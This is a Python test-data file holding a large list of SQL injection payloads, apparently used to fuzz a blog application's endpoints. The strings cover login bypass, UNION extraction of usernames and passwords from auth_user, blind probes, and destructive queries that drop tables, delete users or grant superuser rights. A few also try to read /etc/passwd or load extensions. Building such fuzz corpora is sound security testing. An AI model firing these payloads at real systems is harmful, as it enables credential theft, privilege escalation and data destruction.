"""
SQL injection payload corpus for security testing.
Used by tests_sqli.py to fuzz user-facing endpoints.
"""

SQL_INJECTION_PAYLOADS = [
    # Classic quote / boolean
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR '1'='1' /*",
    "' OR 1=1 --",
    "' OR 1=1#",
    "' OR 1=1/*",
    "admin' --",
    "admin' #",
    "admin'/*",
    "' or ''='",
    "' OR ''='",
    "') OR ('1'='1",
    "') OR ('1'='1' --",
    "' OR 'x'='x",
    "' OR 'a'='a",
    # OR numeric
    "1 OR 1=1",
    "1' OR '1'='1",
    "1 OR 1=1 --",
    "1' OR '1'='1' --",
    "0 OR 1=1",
    "-1 OR 1=1",
    "999 OR 1=1",
    "1 OR 1=1#",
    "1; OR 1=1",
    "1 || 1=1",
    # UNION SELECT (generic)
    "' UNION SELECT NULL--",
    "' UNION SELECT NULL,NULL--",
    "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT 1--",
    "' UNION SELECT 1,2--",
    "' UNION SELECT 1,2,3--",
    "' UNION ALL SELECT NULL--",
    "' UNION ALL SELECT 1,2,3,4,5,6--",
    "') UNION SELECT NULL--",
    "' UNION SELECT username, password FROM auth_user--",
    "' UNION SELECT sql, sql FROM sqlite_master--",
    "' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--",
    "' UNION SELECT tbl_name, sql FROM sqlite_master--",
    "1' UNION SELECT NULL,NULL,NULL,NULL,NULL--",
    "' UNION SELECT group_concat(name) FROM sqlite_master--",
    "' UNION SELECT hex(password) FROM auth_user--",
    "' UNION SELECT email FROM auth_user--",
    "' UNION SELECT password FROM auth_user LIMIT 1--",
    "' UNION SELECT sql FROM sqlite_master WHERE name='auth_user'--",
    # SQLite-specific
    "' UNION SELECT sqlite_version(),NULL--",
    "' UNION SELECT name FROM sqlite_master WHERE type='table'--",
    "' UNION SELECT sql FROM sqlite_master--",
    "1; SELECT * FROM sqlite_master--",
    "'; SELECT * FROM sqlite_master--",
    "1 AND (SELECT COUNT(*) FROM sqlite_master)>0--",
    "1 AND (SELECT LENGTH(sql) FROM sqlite_master LIMIT 1)>0--",
    "' OR (SELECT COUNT(*) FROM auth_user)>0--",
    "' OR EXISTS(SELECT * FROM auth_user)--",
    "1; ATTACH DATABASE 'x' AS x--",
    "1; PRAGMA table_info(auth_user)--",
    # Boolean blind
    "' AND '1'='1",
    "' AND '1'='2",
    "1' AND '1'='1' --",
    "1' AND '1'='2' --",
    "' AND 1=1--",
    "' AND 1=2--",
    "1 AND SUBSTR((SELECT password FROM auth_user LIMIT 1),1,1)='a'--",
    "' AND (SELECT COUNT(*) FROM auth_user WHERE is_superuser=1)>0--",
    "' AND ASCII(SUBSTR((SELECT username FROM auth_user LIMIT 1),1,1))>64--",
    "1' AND (SELECT 1 FROM auth_user WHERE username='admin')=1--",
    "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)=1--",
    "1' AND LENGTH((SELECT password FROM auth_user LIMIT 1))>0--",
    # Time-based (SQLite limited; still useful fuzz strings)
    "'; SELECT CASE WHEN (1=1) THEN LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000)))) ELSE 0 END--",
    "1' AND (SELECT COUNT(*) FROM generate_series(1,1000000))>0--",
    "1' OR (SELECT LIKE('x',UPPER(HEX(RANDOMBLOB(50000000)))))--",
    # Stacked / multi-statement
    "'; DROP TABLE blog_post--",
    "'; DELETE FROM blog_post--",
    "'; UPDATE blog_post SET title='pwned'--",
    "'; INSERT INTO blog_post(title,content,author,slug,timeStamp) VALUES('x','x','x','x',datetime('now'))--",
    "1; DELETE FROM auth_user WHERE id>0--",
    "1'; UPDATE auth_user SET is_superuser=1 WHERE username='admin'--",
    # Comment / whitespace bypass
    "' OR/**/1=1--",
    "' OR%091=1--",
    "' OR%0A1=1--",
    "' OR%0D1=1--",
    "'%20OR%201=1--",
    "' OR\t1=1--",
    "' OR\n1=1--",
    "admin'-- -",
    "admin'#",
    "' OR 1=1;--",
  # Encoding / obfuscation
    "%27%20OR%201%3D1--",
    "&#39; OR 1=1--",
    "\\' OR 1=1--",
    "' OR 1=1 LIMIT 1--",
    "' OR 1=1 LIMIT 1 OFFSET 0--",
    "' OR '1'='1' LIMIT 1--",
    "1' ORDER BY 1--",
    "1' ORDER BY 10--",
    "1' GROUP BY 1--",
    "1' HAVING 1=1--",
    "' OR 1=1 COLLATE NOCASE--",
    "GLOB '*' OR 1=1--",
    "' LIKE '%' OR 1=1--",
    "1' REGEXP '.*' OR 1=1--",
    # Error-based
    "' AND 1=CONVERT(int,(SELECT @@version))--",
    "' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--",
    "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
    "1' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--",
    "' AND 1=CAST((SELECT password FROM auth_user LIMIT 1) AS INT)--",
    # Login-style auth bypass strings
    "admin' OR '1'='1'--",
    "' OR 1=1 LIMIT 1 --",
    "') OR ('x'='x",
    "admin') OR ('1'='1'--",
    "' OR username LIKE '%'--",
    "' OR 1=1) --",
    "admin'/*",
    "' OR '1'='1'/*",
    "') OR 1=1--",
    # LIKE / wildcard abuse
    "%' OR '1'='1",
    "%' OR 1=1--",
    "%%' OR 1=1--",
    "_%' OR 1=1--",
    "' OR title LIKE '%'--",
    # Numeric / ID injection
    "1 OR 1=1",
    "-1 OR 1=1",
    "0 UNION SELECT 1",
    "1; SELECT 1",
    "1 AND 1=0 UNION SELECT sno,title,content,author,slug,timeStamp FROM blog_post--",
    # Edge / null / empty tricks
    "NULL OR 1=1--",
    "'' OR '1'='1",
    "' OR ''='' --",
    "0' OR '0'='0",
    "' OR 'x'='x' --",
    # Additional SQLite union column-count probes
    "' ORDER BY 1--",
    "' ORDER BY 5--",
    "' ORDER BY 6--",
    "' UNION SELECT 1,2,3,4,5--",
    "' UNION SELECT 1,2,3,4,5,6--",
    "' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--",
    # Out-of-band style strings (fuzz only on SQLite)
    "'; LOAD_EXTENSION('evil')--",
    "' OR load_extension('x')--",
    # Chained conditions
    "' OR 1=1 AND '1'='1",
    "' OR 1=1 AND 1=2 OR '1'='1",
    "1' OR '1'='1' AND username='admin'--",
    "' OR (1=1 AND (SELECT COUNT(*) FROM blog_post)>0)--",
    "' OR (SELECT COUNT(*) FROM home_contact)>0--",
    # Hex / char construction
    "' OR CHAR(49)=CHAR(49)--",
    "0x27 OR 1=1--",
    "' OR 0x31=0x31--",
    # Final batch to exceed 100
    "'; WAITFOR DELAY '0:0:5'--",
    "1' AND SLEEP(5)--",
    "' OR BENCHMARK(1000000,MD5('x'))--",
    "' OR pg_sleep(5)--",
    "1' RLIKE (SELECT GROUP_CONCAT(password) FROM auth_user)--",
    "' OR 1=1 INTO OUTFILE '/tmp/x'--",
    "' UNION SELECT load_file('/etc/passwd')--",
]
